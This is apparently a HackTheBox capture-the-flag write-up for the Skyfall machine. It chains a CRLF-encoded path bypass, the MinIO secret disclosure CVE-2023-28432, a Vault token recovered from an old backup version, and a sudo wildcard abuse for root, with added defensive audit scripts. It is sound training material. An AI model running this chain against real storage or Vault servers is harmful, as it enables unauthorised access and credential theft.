1.1) Service Enumeration — Nmap
1.2) Directory Enumeration — Gobuster (or) Dirsearch
1.3) Subdomain Enumeration — Gobuster
Initial Foothold
2.1) Port — 80
2.2) Getting into the Machine
2.3) User.txt — Gaining User Access
Privilege Escalation — Pivoting
3.1) Root.txt — Gaining Root Access
Pre-requisites
Connect to the HackTheBox’s Seasonal Machine’s VPN.
Download the resources here — https://github.com/Cyberw1ng/OSCP/tree/main/HackTheBox/Skyfall
Add the below hosts to /etc/hosts using the below command. Make sure to replace IP with the HackTheBox machine’s IP.
echo "IP skyfall.htb demo.skyfall.htb prd23-s3-backend.skyfall.htb prd23-vault-internal.skyfall.htb" | sudo tee -a /etc/hosts
Grab a coffee and start the process!
1. Service Enumeration — Nmap
Let’s perform a basic Nmap scan using the below command:
nmap -sC -sV IP
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCVqvI8vGs8EIUAAUiRze8kfKmYh9ETTUei3zRd1wWWLRBjSm+soBLfclIUP69cNtQOa961nyt2/BOwuR35cLR4=
| 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINk0VgEkDNZoIJwcG5LEVZDZkEeSRHLBmAOtd/pduzRW
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2. Directory Enumeration — Gobuster (or) Dirsearch
Then, perform a directory enumeration using the following command:
dirsearch -u skyfall.htb -e*
(or)
gobuster dir -u http://skyfall.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
Found a subdomain. The output below comes from gobuster’s virtual-host mode (its banner reports “VHOST enumeration mode” with “Append Domain: true”, i.e. gobuster vhost -u http://skyfall.htb -w <wordlist> --append-domain), which is what surfaces demo.skyfall.htb:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://skyfall.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 28 / 19967 (0.14%)[ERROR] Get "http://skyfall.htb/assets/":
Progress: 19966 / 19967 (99.99%)
===============================================================
demo.skyfall.htb
Finished
3. Subdomain Enumeration — Gobuster
Similarly, perform a DNS enumeration using the following command:
gobuster dns -d skyfall.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20
But nothing interesting was found in the scan.
1. Port — 80
1. On enumerating skyfall.htb we get a subdomain, demo.skyfall.htb.
2. If you followed the pre-requisites section, open http://demo.skyfall.htb. Else, add it to /etc/hosts and open it.
3. We found a credential, guest:guest. Log in to the account.
4. There we can upload, download, rename, and delete a file. Unfortunately, nothing works.
5. Upon clicking Minio, you’ll see a Forbidden page.
6. If you add a CRLF payload at the end of the URL, we are able to access the page: http://demo.skyfall.htb/metrics%0a
7. From this page, we can find the address of the MinIO cluster: http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster
8. On researching /minio/v2/metrics/cluster I got to know about an information disclosure vulnerability, CVE-2023-28432 (research it to get a clue about the below POC and to know why I’m capturing the below request).
9. If the vulnerability is present, the response will include all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.
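Why a trailing %0a gets past the Forbidden page is worth spelling out from the defender’s side: an access rule that compares the raw, still percent-encoded request path against the literal string /metrics does not match /metrics%0a, while the application behind the proxy decodes the path and ignores the stray newline, so the request is routed to the real endpoint. The script below is an added example, not code from the write-up or from the box; the exact proxy configuration on Skyfall is not shown, so the “naive” rule, the DENIED_PATHS list and the function names are assumptions. It contrasts that naive check with one that rejects control characters outright (including double-encoded ones) and compares a canonicalised path.

```python
"""Deny-rule bypass via an encoded control character, and a hardened check.

Added example (not from the write-up).  Assumption: the flawed proxy rule
compares the raw request path with an exact string, while the upstream
percent-decodes the path and drops the trailing control character.
"""
import posixpath
import re
from urllib.parse import unquote

# Assumed set of endpoints the reverse proxy is meant to keep private.
DENIED_PATHS = ("/metrics", "/minio/v2/metrics/cluster")


def naive_is_blocked(raw_path: str) -> bool:
    """Flawed check: exact string match on the raw, undecoded request path."""
    return raw_path in DENIED_PATHS


def _has_control_chars(text: str) -> bool:
    """True if the text contains ASCII control characters (CR, LF, NUL, ...)."""
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in text)


def canonicalize(raw_path: str) -> str:
    """Reduce a request path to the form the upstream would route on:
    query string dropped, percent-encoding decoded once, repeated slashes
    collapsed, dot segments resolved."""
    path = raw_path.split("?", 1)[0]
    path = unquote(path)
    path = re.sub(r"/+", "/", path)      # posixpath.normpath keeps a leading '//'
    path = posixpath.normpath(path)
    if path in (".", ""):
        path = "/"
    if not path.startswith("/"):
        path = "/" + path
    return path


def hardened_is_blocked(raw_path: str) -> bool:
    """Reject any request whose decoded path carries control characters, even
    double-encoded ones (%250a -> %0a -> LF), then compare the canonical path
    against the deny list (exact match or anything underneath it)."""
    decoded = unquote(raw_path.split("?", 1)[0])
    if _has_control_chars(decoded) or _has_control_chars(unquote(decoded)):
        return True
    path = canonicalize(raw_path)
    return any(path == d or path.startswith(d + "/") for d in DENIED_PATHS)


if __name__ == "__main__":
    probes = ("/metrics", "/metrics%0a", "/metrics%0d%0a", "/metrics%250a",
              "/static/../metrics", "//metrics/", "/assets/app.js")
    for probe in probes:
        print(f"{probe:22} naive={naive_is_blocked(probe)!s:5} "
              f"hardened={hardened_is_blocked(probe)}")
```

The lesson for a proxy operator is that the check must run on the same representation the upstream routes on; the cleanest fix is to refuse malformed paths early rather than to normalise ever more creatively, which is what the hardened function does before it ever looks at the deny list.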
2. User.txt — Getting into the Machine
1. Download and install the MinIO client (mc) to get started. Use the below commands to install it.
curl https://dl.min.io/client/mc/release/linux-amd64/mc \
  --create-dirs \
  -o $HOME/minio-binaries/mc
chmod +x $HOME/minio-binaries/mc
export PATH=$PATH:$HOME/minio-binaries/
2. After installing the tool, use the below command to set an alias named “myminio” for connecting to the S3-compatible storage service hosted at http://prd23-s3-backend.skyfall.htb with the access and secret keys obtained above. The alias makes it easy to interact with this storage service using the mc tool. (Make sure to replace ACCESS_KEY and SECRET_KEY.)
mc alias set myminio http://prd23-s3-backend.skyfall.htb ACCESS_KEY SECRET_KEY
3. Now, let’s list all the files in the service, including older object versions, using:
mc ls --recursive --versions myminio
[2023-11-08 10:29:15 IST] 0B askyy/
[2023-11-08 11:05:28 IST] 48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-10 03:07:25 IST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-10 03:07:09 IST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-10 03:06:30 IST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
[2023-11-08 10:28:56 IST] 0B btanner/
[2023-11-08 11:05:36 IST] 48KiB STANDARD null v1 PUT btanner/Welcome.pdf
[2023-11-08 10:28:33 IST] 0B emoneypenny/
[2023-11-08 11:05:56 IST] 48KiB STANDARD null v1 PUT emoneypenny/Welcome.pdf
[2023-11-08 10:28:22 IST] 0B gmallory/
[2023-11-08 11:06:02 IST] 48KiB STANDARD null v1 PUT gmallory/Welcome.pdf
[2023-11-08 05:38:01 IST] 0B guest/
[2023-11-08 05:38:05 IST] 48KiB STANDARD null v1 PUT guest/Welcome.pdf
[2023-11-08 10:29:05 IST] 0B jbond/
[2023-11-08 11:05:45 IST] 48KiB STANDARD null v1 PUT jbond/Welcome.pdf
[2023-11-08 10:28:10 IST] 0B omansfield/
[2023-11-08 11:06:09 IST] 48KiB STANDARD null v1 PUT omansfield/Welcome.pdf
[2023-11-08 10:28:45 IST] 0B rsilva/
[2023-11-08 11:05:51 IST] 48KiB STANDARD null v1 PUT rsilva/Welcome.pdf
4. Let’s download version v2 of home_backup.tar.gz by its version id and examine the files using the below commands:
mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz ./home_backup.tar.gz
tar -xzvf home_backup.tar.gz
cat .bashrc
5. We found a Vault API address and a Vault token in the .bashrc file.
6. Use the below commands to download Vault and log in to it (make sure to paste the above token at the login prompt).
$ unzip vault_1.15.5_linux_amd64.zip
$ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
$ ./vault login
7. Now, use ./vault token capabilities ssh/roles
This command checks the capabilities of the token with regard to the SSH roles in the Vault. In this case, the capabilities include the ability to list.
8. Then use ./vault list ssh/roles
This command lists the available SSH roles in the Vault. It displays the roles that have been configured for SSH authentication.
9. Now use the below command, which initiates an SSH session in one-time password (OTP) mode for the role named dev_otp_key_role. The connection is made to the SSH server as the user askyy at the specified IP address (HTB_IP). Additionally, the option -strict-host-key-checking=no disables strict host key checking during the connection.
Make sure to replace HTB_IP with your machine’s IP in the below command.
$ ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no askyy@HTB_IP
Warning: Permanently added '10.129.218.149' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-92-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
askyy@skyfall:~$ cat user.txt
3294a753bfe64cXXXXXXXXXX87422f76
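The version listing in step 3 is the defender’s lesson of this section: bucket versioning kept three copies of askyy/home_backup.tar.gz, and the superseded v1 is 1.2 MiB against 2.5 KiB for the current object, so a secret “removed” by re-uploading a trimmed archive is still one --vid away. The script below is an added example, not code from the write-up or from MinIO; it parses the mc ls --recursive --versions output reproduced above (embedded here as sample input in the column layout shown on this page, which other mc releases may print differently, so that is an assumption) and flags keys whose older versions dwarf the current one.

```python
"""Audit an `mc ls --recursive --versions` listing for objects whose
superseded versions are still retained and suspiciously large.

Added example, not from the write-up.  SAMPLE_LISTING is the listing shown
on this page; the column layout it assumes is the one mc printed there.
"""
import re
from collections import defaultdict

SAMPLE_LISTING = """\
[2023-11-08 10:29:15 IST] 0B askyy/
[2023-11-08 11:05:28 IST] 48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-10 03:07:25 IST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-10 03:07:09 IST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-10 03:06:30 IST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
[2023-11-08 10:28:56 IST] 0B btanner/
[2023-11-08 11:05:36 IST] 48KiB STANDARD null v1 PUT btanner/Welcome.pdf
[2023-11-08 10:28:33 IST] 0B emoneypenny/
[2023-11-08 11:05:56 IST] 48KiB STANDARD null v1 PUT emoneypenny/Welcome.pdf
[2023-11-08 10:28:22 IST] 0B gmallory/
[2023-11-08 11:06:02 IST] 48KiB STANDARD null v1 PUT gmallory/Welcome.pdf
[2023-11-08 05:38:01 IST] 0B guest/
[2023-11-08 05:38:05 IST] 48KiB STANDARD null v1 PUT guest/Welcome.pdf
[2023-11-08 10:29:05 IST] 0B jbond/
[2023-11-08 11:05:45 IST] 48KiB STANDARD null v1 PUT jbond/Welcome.pdf
[2023-11-08 10:28:10 IST] 0B omansfield/
[2023-11-08 11:06:09 IST] 48KiB STANDARD null v1 PUT omansfield/Welcome.pdf
[2023-11-08 10:28:45 IST] 0B rsilva/
[2023-11-08 11:05:51 IST] 48KiB STANDARD null v1 PUT rsilva/Welcome.pdf
"""

# "[timestamp] size [class version-id vN op] key"; the bracketed middle is
# absent for prefix (directory) lines.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<size>\S+)\s+"
    r"(?:(?P<storage_class>\S+)\s+(?P<version_id>\S+)\s+v(?P<version>\d+)\s+(?P<op>\S+)\s+)?"
    r"(?P<key>\S+)$"
)
_UNITS = {"B": 1, "KiB": 1024, "MiB": 1024 ** 2, "GiB": 1024 ** 3, "TiB": 1024 ** 4}


def to_bytes(size: str) -> int:
    """Convert mc's human-readable size ('2.5KiB', '0B') to bytes."""
    m = re.fullmatch(r"([\d.]+)([KMGT]iB|B)", size)
    if not m:
        raise ValueError(f"unrecognised size: {size!r}")
    return int(round(float(m.group(1)) * _UNITS[m.group(2)]))


def parse_listing(text: str) -> list:
    """Parse every non-empty line into a dict; raise on an unexpected layout."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unexpected listing line: {line!r}")
        rec = m.groupdict()
        rec["bytes"] = to_bytes(rec["size"])
        rec["is_dir"] = rec["version"] is None and rec["key"].endswith("/")
        rec["version"] = int(rec["version"]) if rec["version"] else None
        records.append(rec)
    return records


def versions_by_key(records: list) -> dict:
    """Map object key -> its versions, newest first (prefix lines ignored)."""
    grouped = defaultdict(list)
    for rec in records:
        if not rec["is_dir"]:
            grouped[rec["key"]].append(rec)
    for versions in grouped.values():
        versions.sort(key=lambda r: r["version"], reverse=True)
    return dict(grouped)


def multi_version_objects(records: list) -> dict:
    """Only the keys that still carry more than one retained version."""
    return {k: v for k, v in versions_by_key(records).items() if len(v) > 1}


def stale_large_versions(records: list, ratio: float = 10.0) -> list:
    """Keys where a superseded version is at least `ratio` times the current size."""
    flagged = []
    for key, versions in multi_version_objects(records).items():
        current = versions[0]["bytes"]
        biggest_old = max(v["bytes"] for v in versions[1:])
        if current > 0 and biggest_old >= ratio * current:
            flagged.append(key)
    return sorted(flagged)


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for key, versions in multi_version_objects(recs).items():
        sizes = ", ".join(f"v{v['version']}={v['size']}" for v in versions)
        print(f"{key}: {len(versions)} versions ({sizes})")
    print("review for retained secrets:", stale_large_versions(recs))
```

Run against a real deployment this would be fed the output of mc ls over every bucket; the remediation for a flagged key is a lifecycle rule that expires non-current versions, plus rotation of whatever the old version held, since deleting it does not un-leak it.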
3. Root.txt — Gaining Root Access
1. Check what askyy is allowed to run with sudo using sudo -l:
Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
2. Now, let's delete the debug.log file and create it again using
rm -rf debug.log
touch debug.log
3. Then, run the below command:
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd
4. The above command executes vault-unseal with elevated privileges using sudo. The -c option specifies a configuration file (/etc/vault-unseal.yaml), and -vd enables verbose mode for debugging.
5. After doing the above 3 steps, type the exit command.
6. After you log out, type the below commands:
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
./vault login
7. We use export VAULT_ADDR to set the address of the Vault server. The subsequent ./vault login command authenticates and obtains access to Vault’s functionality. Finally, use the ./vault ssh command, configured with the role admin_otp_key_role and OTP mode, to generate SSH credentials for the user root on the target server at the specified IP address (HTB_IP). The option -strict-host-key-checking=no bypasses strict host key checking during the SSH connection.
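The sudo rule that makes this escalation possible is the wildcard in `/root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*`: the second rule would only permit the exact invocation, but the first hands every combination of -v, -h and -d to a caller who never types a password, and the debug flag is what writes the sensitive output into a file the caller controls. The script below is an added example, not from the write-up: it parses the sudo -l output reproduced above (embedded as sample input) and rates each rule on the three properties that matter here, NOPASSWD, a root run-as target and a glob in the argument list. It handles the line shape sudo -l prints on this page; fuller sudoers syntax is out of scope, which is an assumption.

```python
"""Audit `sudo -l` rule lines for option wildcards on root-run commands.

Added example, not from the write-up.  SAMPLE_SUDO_L is the output shown
on this page; only the "(runas) TAG: command args" shape is parsed.
"""
import re

SAMPLE_SUDO_L = """\
User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
"""

RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<command>.+?)\s*$"
)
GLOB_CHARS = set("*?[")   # sudoers matches arguments with shell-style globs


def parse_rule(line: str):
    """Parse one rule line into a dict, or return None for non-rule lines."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    runas_user = m.group("runas").split(":")[0].strip()
    tags = [t.rstrip(":") for t in m.group("tags").split()]
    words = m.group("command").split()
    binary, args = words[0], words[1:]
    glob_args = [a for a in args if any(ch in GLOB_CHARS for ch in a)]
    rule = {
        "runas_user": runas_user,
        "tags": tags,
        "binary": binary,
        "args": args,
        "nopasswd": "NOPASSWD" in tags,
        "runs_as_root": runas_user in ("ALL", "root"),
        "glob_args": glob_args,
    }
    rule["findings"] = _findings(rule)
    rule["risk"] = _risk(rule)
    return rule


def _findings(rule: dict) -> list:
    out = []
    if rule["nopasswd"]:
        out.append("no password required")
    if rule["runs_as_root"]:
        out.append("may run as root")
    for a in rule["glob_args"]:
        out.append(f"argument glob {a!r} lets the caller choose options")
    return out


def _risk(rule: dict) -> str:
    """A root-run command whose options are caller-controlled is the worst case."""
    if rule["runs_as_root"] and rule["glob_args"]:
        return "high"
    if rule["runs_as_root"] and rule["nopasswd"]:
        return "medium"
    return "low"


def parse_sudo_l(text: str) -> list:
    """Collect every rule line from `sudo -l` output, skipping the headers."""
    return [r for r in (parse_rule(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for rule in parse_sudo_l(SAMPLE_SUDO_L):
        print(f"[{rule['risk']:6}] {rule['binary']} {' '.join(rule['args'])}")
        for f in rule["findings"]:
            print("         -", f)
```

The fix the audit points at is to keep only the exact-invocation rule (the second line) and drop the `[-vhd]*` variant; if an operator genuinely needs verbose output, the tool should write it somewhere the invoking user cannot read rather than into the current directory.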